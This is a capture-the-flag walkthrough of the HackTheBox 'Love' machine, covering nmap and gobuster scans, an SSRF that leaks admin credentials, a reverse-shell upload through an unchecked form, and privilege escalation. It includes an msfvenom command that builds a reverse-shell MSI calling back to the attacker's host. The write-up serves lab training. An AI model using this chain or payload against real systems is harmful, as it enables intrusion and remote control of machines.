Love (Easy)

Love Hackthebox Walkthrough

Enumeration

Nmap

nmap -sC -sV 10.10.10.239

Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 02:53 EDT
Nmap scan report for www.love.htb (10.10.10.239)
Host is up (0.16s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LPDString, NULL, RPCCheck, RTSPRequest, SMBProgNeg, TerminalServerCookie, X11Probe: 
|_    Host '10.10.16.4' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=5/31%Time=60B487E9%P=x86_64-pc-linux-gnu%r(NU
SF:LL,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines,
SF:49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x
SF:20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,49,"E
SF:\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\
SF:x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,49,"E\0\0
SF:\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20c
SF:onnect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,49,"E\0\0\x01
SF:\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20conne
SF:ct\x20to\x20this\x20MariaDB\x20server")%r(RPCCheck,49,"E\0\0\x01\xffj\x
SF:04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20t
SF:o\x20this\x20MariaDB\x20server")%r(DNSVersionBindReqTCP,49,"E\0\0\x01\x
SF:ffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect
SF:\x20to\x20this\x20MariaDB\x20server")%r(DNSStatusRequestTCP,49,"E\0\0\x
SF:01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20con
SF:nect\x20to\x20this\x20MariaDB\x20server")%r(Help,49,"E\0\0\x01\xffj\x04
SF:Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\
SF:x20this\x20MariaDB\x20server")%r(TerminalServerCookie,49,"E\0\0\x01\xff
SF:j\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x
SF:20to\x20this\x20MariaDB\x20server")%r(Kerberos,49,"E\0\0\x01\xffj\x04Ho
SF:st\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x2
SF:0this\x20MariaDB\x20server")%r(SMBProgNeg,49,"E\0\0\x01\xffj\x04Host\x2
SF:0'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this
SF:\x20MariaDB\x20server")%r(X11Probe,49,"E\0\0\x01\xffj\x04Host\x20'10\.1
SF:0\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Mar
SF:iaDB\x20server")%r(FourOhFourRequest,49,"E\0\0\x01\xffj\x04Host\x20'10\
SF:.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20M
SF:ariaDB\x20server")%r(LPDString,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.1
SF:6\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB
SF:\x20server");
Service Info: Hosts: www.example.com, LOVE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 21m33s, deviation: 0s, median: 21m32s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-31T07:15:18
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.02 seconds

so many ports opened :) yeah Windows machine.

Before that, we can see that some subdomains i listed here

staging.love.htb

ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in

Let's put it in /etc/hosts file

Ok lets start enumerating :)

Gobuster

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.239/

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.239/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/05/31 03:58:19 Starting gobuster
===============================================================
/images (Status: 301)
/Images (Status: 301)
/admin (Status: 301)
/plugins (Status: 301)
/includes (Status: 301)
/dist (Status: 301)
/licenses (Status: 403)
/IMAGES (Status: 301)
/%20 (Status: 403)
Progress: 4881 / 220561 (2.21%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/05/31 03:59:08 Finished
===============================================================

We can see there are some directory that might can be accessed.

Web Enumeration

When we go to port 80, we can see there is a form to login.

Then we go to port 5000 and got this forbidden message

Lets navigate to staging.love.htb

wow got a completely new page, lets navigate to demo page

We can see we can specify a URL to scan, after few tries, we realized that it might have SSRF vulnerability.

Port 80 does nothing, let's try port 5000 which give us forbidden just now.

wow credentials !!

Lets navigate to /admin at port 80 to login

Now, we can try to upload a shell.

Reverse Shell

We can upload a reverse shell here. Since it does not check for file extension.

After that, the file will be stored at /Images

Note: We need to use Windows reverse shell as the Linux version of course will not work :)
Link to download Windows reverse shell file: Here

We can change the IP and port at the end of the file and upload it!

We can see there is a reverse shell file uploaded.

Finally, we have a user shell !

Privilege Escalation

Then we can run winPEAS to find what is the vulnerability.

After searching for awhile, then we found this vulnerability

After Googling for some time, we found this article.

We can use the method 1 that listed inside the article by building a injection file using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.4 LPORT=5555 -f msi -o reverse.msi

After we created this file and we can sent it over to the victim machine.

After that we can spawn another reverse shell.

ayy root.

Congratz.

PreviousArmageddon (Easy)NextKnife (Easy)

Last updated 4 years ago

hashtagEnumeration

hashtagNmap

hashtagGobuster

hashtagWeb Enumeration

hashtagReverse Shell

hashtagPrivilege Escalation